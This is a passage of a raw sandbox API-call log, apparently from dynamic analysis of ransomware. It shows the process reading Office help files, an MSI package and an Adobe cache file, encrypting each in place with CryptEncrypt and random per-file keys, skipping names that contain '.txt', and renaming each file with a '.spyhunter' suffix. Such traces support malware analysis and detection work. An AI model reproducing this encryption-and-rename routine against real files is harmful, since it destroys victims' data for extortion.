dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0129.934] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn") returned 65 [0129.934] StrStrW (lpFirst="MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".txt") returned 0x0 [0129.934] GetProcessHeap () returned 0x2c0000 [0129.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0129.935] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf604, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf604*=0x188, lpOverlapped=0x0) returned 1 [0129.935] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffe78, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.936] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x188, lpNumberOfBytesWritten=0x25cf604, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf604*=0x188, lpOverlapped=0x0) returned 1 [0129.936] GetProcessHeap () returned 0x2c0000 [0129.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0129.936] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.936] WriteFile (in: hFile=0xf4, lpBuffer=0x25cf644*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf604, lpOverlapped=0x0 | out: lpBuffer=0x25cf644*, lpNumberOfBytesWritten=0x25cf604*=0x4, lpOverlapped=0x0) returned 1 [0129.936] WriteFile (in: hFile=0xf4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf604, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cf604*=0x30, lpOverlapped=0x0) returned 1 [0129.936] CloseHandle (hObject=0xf4) returned 1 [0129.936] GetProcessHeap () returned 0x2c0000 [0129.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f05c68 [0129.936] wnsprintfW (in: pszDest=0x2f05c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.spyhunter") returned 75 [0129.937] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.shapesheet.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.spyhunter" (normalized: "c:\\programdata\\microsoft help\\ms.visio.shapesheet.14.1033.hxn.spyhunter")) returned 1 [0129.937] GetProcessHeap () returned 0x2c0000 [0129.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05c68 | out: hHeap=0x2c0000) returned 1 [0129.937] GetProcessHeap () returned 0x2c0000 [0129.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.937] GetProcessHeap () returned 0x2c0000 [0129.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08208 | out: hHeap=0x2c0000) returned 1 [0129.938] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf640 | out: pbBuffer=0x25cf640) returned 1 [0129.938] GetProcessHeap () returned 0x2c0000 [0129.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.938] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf638*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf638*=0x30) returned 1 [0129.938] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0129.938] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn") returned 58 [0129.938] StrStrW (lpFirst="MS.VISIO.DEV.14.1033.hxn", lpSrch=".txt") returned 0x0 [0129.938] GetProcessHeap () returned 0x2c0000 [0129.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0129.939] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf5fc*=0x15e, lpOverlapped=0x0) returned 1 [0129.940] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffea2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.940] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x25cf5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf5fc*=0x15e, lpOverlapped=0x0) returned 1 [0129.940] GetProcessHeap () returned 0x2c0000 [0129.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0129.940] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.940] WriteFile (in: hFile=0xf4, lpBuffer=0x25cf63c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf5fc, lpOverlapped=0x0 | out: lpBuffer=0x25cf63c*, lpNumberOfBytesWritten=0x25cf5fc*=0x4, lpOverlapped=0x0) returned 1 [0129.940] WriteFile (in: hFile=0xf4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf5fc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cf5fc*=0x30, lpOverlapped=0x0) returned 1 [0129.940] CloseHandle (hObject=0xf4) returned 1 [0129.941] GetProcessHeap () returned 0x2c0000 [0129.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f05c68 [0129.941] wnsprintfW (in: pszDest=0x2f05c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.spyhunter") returned 68 [0129.941] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.spyhunter" (normalized: "c:\\programdata\\microsoft help\\ms.visio.dev.14.1033.hxn.spyhunter")) returned 1 [0129.942] GetProcessHeap () returned 0x2c0000 [0129.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05c68 | out: hHeap=0x2c0000) returned 1 [0129.942] GetProcessHeap () returned 0x2c0000 [0129.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.942] GetProcessHeap () returned 0x2c0000 [0129.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2cd38 | out: hHeap=0x2c0000) returned 1 [0129.942] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf640 | out: pbBuffer=0x25cf640) returned 1 [0129.942] GetProcessHeap () returned 0x2c0000 [0129.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.942] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf638*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf638*=0x30) returned 1 [0129.942] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0129.943] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn") returned 54 [0129.943] StrStrW (lpFirst="MS.VISIO.14.1033.hxn", lpSrch=".txt") returned 0x0 [0129.943] GetProcessHeap () returned 0x2c0000 [0129.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0129.943] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf5fc*=0x146, lpOverlapped=0x0) returned 1 [0129.944] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.944] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x25cf5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf5fc*=0x146, lpOverlapped=0x0) returned 1 [0129.944] GetProcessHeap () returned 0x2c0000 [0129.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0129.944] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.944] WriteFile (in: hFile=0xf4, lpBuffer=0x25cf63c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf5fc, lpOverlapped=0x0 | out: lpBuffer=0x25cf63c*, lpNumberOfBytesWritten=0x25cf5fc*=0x4, lpOverlapped=0x0) returned 1 [0129.944] WriteFile (in: hFile=0xf4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf5fc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cf5fc*=0x30, lpOverlapped=0x0) returned 1 [0129.944] CloseHandle (hObject=0xf4) returned 1 [0129.945] GetProcessHeap () returned 0x2c0000 [0129.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f05c68 [0129.945] wnsprintfW (in: pszDest=0x2f05c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn.spyhunter") returned 64 [0129.945] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn.spyhunter" (normalized: "c:\\programdata\\microsoft help\\ms.visio.14.1033.hxn.spyhunter")) returned 1 [0129.952] GetProcessHeap () returned 0x2c0000 [0129.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05c68 | out: hHeap=0x2c0000) returned 1 [0129.952] GetProcessHeap () returned 0x2c0000 [0129.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.953] GetProcessHeap () returned 0x2c0000 [0129.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec23f0 | out: hHeap=0x2c0000) returned 1 [0129.953] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf638 | out: pbBuffer=0x25cf638) returned 1 [0129.953] GetProcessHeap () returned 0x2c0000 [0129.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.953] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf630*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf630*=0x30) returned 1 [0129.953] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.setlang.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0129.953] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn") returned 56 [0129.953] StrStrW (lpFirst="MS.SETLANG.14.1033.hxn", lpSrch=".txt") returned 0x0 [0129.953] GetProcessHeap () returned 0x2c0000 [0129.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0129.954] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf5f4*=0x152, lpOverlapped=0x0) returned 1 [0129.955] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffeae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.955] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x25cf5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf5f4*=0x152, lpOverlapped=0x0) returned 1 [0129.955] GetProcessHeap () returned 0x2c0000 [0129.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0129.955] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.955] WriteFile (in: hFile=0xf4, lpBuffer=0x25cf634*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf5f4, lpOverlapped=0x0 | out: lpBuffer=0x25cf634*, lpNumberOfBytesWritten=0x25cf5f4*=0x4, lpOverlapped=0x0) returned 1 [0129.955] WriteFile (in: hFile=0xf4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf5f4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cf5f4*=0x30, lpOverlapped=0x0) returned 1 [0129.955] CloseHandle (hObject=0xf4) returned 1 [0129.956] GetProcessHeap () returned 0x2c0000 [0129.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f05c68 [0129.956] wnsprintfW (in: pszDest=0x2f05c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn.spyhunter") returned 66 [0129.956] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.setlang.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn.spyhunter" (normalized: "c:\\programdata\\microsoft help\\ms.setlang.14.1033.hxn.spyhunter")) returned 1 [0129.957] GetProcessHeap () returned 0x2c0000 [0129.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05c68 | out: hHeap=0x2c0000) returned 1 [0129.957] GetProcessHeap () returned 0x2c0000 [0129.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.957] GetProcessHeap () returned 0x2c0000 [0129.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2cc78 | out: hHeap=0x2c0000) returned 1 [0129.957] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf638 | out: pbBuffer=0x25cf638) returned 1 [0129.957] GetProcessHeap () returned 0x2c0000 [0129.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.957] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf630*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf630*=0x30) returned 1 [0129.957] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0129.958] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn") returned 61 [0129.958] StrStrW (lpFirst="MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".txt") returned 0x0 [0129.958] GetProcessHeap () returned 0x2c0000 [0129.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0129.958] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf5f4*=0x170, lpOverlapped=0x0) returned 1 [0129.990] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffe90, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.990] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x25cf5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf5f4*=0x170, lpOverlapped=0x0) returned 1 [0129.991] GetProcessHeap () returned 0x2c0000 [0129.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0129.991] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.991] WriteFile (in: hFile=0xf4, lpBuffer=0x25cf634*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf5f4, lpOverlapped=0x0 | out: lpBuffer=0x25cf634*, lpNumberOfBytesWritten=0x25cf5f4*=0x4, lpOverlapped=0x0) returned 1 [0129.991] WriteFile (in: hFile=0xf4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf5f4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cf5f4*=0x30, lpOverlapped=0x0) returned 1 [0129.991] CloseHandle (hObject=0xf4) returned 1 [0129.991] GetProcessHeap () returned 0x2c0000 [0129.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f05c68 [0129.991] wnsprintfW (in: pszDest=0x2f05c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.spyhunter") returned 71 [0129.991] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.spyhunter" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.dev.14.1033.hxn.spyhunter")) returned 1 [0130.019] GetProcessHeap () returned 0x2c0000 [0130.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05c68 | out: hHeap=0x2c0000) returned 1 [0130.020] GetProcessHeap () returned 0x2c0000 [0130.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0130.020] GetProcessHeap () returned 0x2c0000 [0130.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c850a0 | out: hHeap=0x2c0000) returned 1 [0130.078] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf620 | out: pbBuffer=0x25cf620) returned 1 [0130.078] GetProcessHeap () returned 0x2c0000 [0130.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0130.078] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf618*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf618*=0x30) returned 1 [0130.078] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0130.079] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 140 [0130.079] StrStrW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".txt") returned 0x0 [0130.079] GetProcessHeap () returned 0x2c0000 [0130.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0130.079] ReadFile (in: hFile=0x170, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf5dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf5dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.093] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0130.093] WriteFile (in: hFile=0x170, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf5dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf5dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.093] GetProcessHeap () returned 0x2c0000 [0130.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0130.093] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.093] WriteFile (in: hFile=0x170, lpBuffer=0x25cf61c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf5dc, lpOverlapped=0x0 | out: lpBuffer=0x25cf61c*, lpNumberOfBytesWritten=0x25cf5dc*=0x4, lpOverlapped=0x0) returned 1 [0130.093] WriteFile (in: hFile=0x170, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf5dc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf5dc*=0x30, lpOverlapped=0x0) returned 1 [0130.093] CloseHandle (hObject=0x170) returned 1 [0130.094] GetProcessHeap () returned 0x2c0000 [0130.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0130.094] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.spyhunter") returned 150 [0130.094] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.spyhunter" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.spyhunter")) returned 1 [0130.094] GetProcessHeap () returned 0x2c0000 [0130.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0130.094] GetProcessHeap () returned 0x2c0000 [0130.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0130.095] GetProcessHeap () returned 0x2c0000 [0130.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8278 | out: hHeap=0x2c0000) returned 1 [0130.136] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf610 | out: pbBuffer=0x25cf610) returned 1 [0130.136] GetProcessHeap () returned 0x2c0000 [0130.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0130.136] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf608*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf608*=0x30) returned 1 [0130.137] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\acecache11.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0130.138] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst") returned 74 [0130.138] StrStrW (lpFirst="ACECache11.lst", lpSrch=".txt") returned 0x0 [0130.138] GetProcessHeap () returned 0x2c0000 [0130.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0130.138] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf5cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf5cc*=0x49c, lpOverlapped=0x0) returned 1 [0130.139] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb64, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0130.140] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, 